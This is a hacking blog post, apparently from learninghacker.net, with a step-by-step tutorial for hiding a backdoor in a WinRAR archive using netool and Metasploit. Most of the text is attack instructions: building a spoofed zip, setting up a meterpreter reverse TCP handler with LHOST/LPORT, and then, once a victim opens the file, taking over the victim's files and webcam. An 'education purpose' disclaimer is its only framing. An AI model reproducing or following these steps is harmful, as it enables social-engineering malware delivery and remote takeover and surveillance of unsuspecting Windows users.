Malicious Backdoor For Attack Any Windows


A professional hacker must think hard to be able to realize his desire to hack a system. A windows system has many loopholes that a hacker can enter. An old trick how to insert a backdoor into a win RAR. the backdoor will be neatly wrapped inside a win RAR. when windows user opens the win RAR file, then the hacker will start to get the target OS system.

This trick is very easy to get the target. All depends on the hacker skills. At this moment learninghacker.net will begin to explain about how to create backdoor / payload JPG in Win RAR format using netool. netool is a free software, you can see it on the official netool site here. And Link of netool via github in here.


But remember. this trick is only for education purpose.
Ok we started with the tutorial.

Open Netool
./netool.sh

Select RootSector Exploit.
Type 8 for select this

Set Your interface used

Select WinRAR Backdoor
Type 17 for select

Set Your Local IP

Set Name for Zip file

Input Name for SPOOF file

Then will reirect to msfconsole

You have set FILENAME sexy.zip

And set LPORT

Next type exploit for start exploitation
And look at location file backdoor./root/.msf5/local/sexy.zip

Type back
You have set for handler
use exploit/multi/handler
set payload windows/meterpreter/reverse/tcp

Set LHOST "Your Local IP"
Set LPORT "4452"

Type explolit

In victim
So. if the victim open the file .RAT(backdoor) like this.


And meterpreter session will be opened. like this

You have start for explore the victim os.
upload files, download files, delete files, set desktop victim, webcam stream in victim and many more.

Thanks. happy learning.

Tutorial version Video in here


Subscribe to receive free email updates:

0 Response to "Malicious Backdoor For Attack Any Windows"

Post a Comment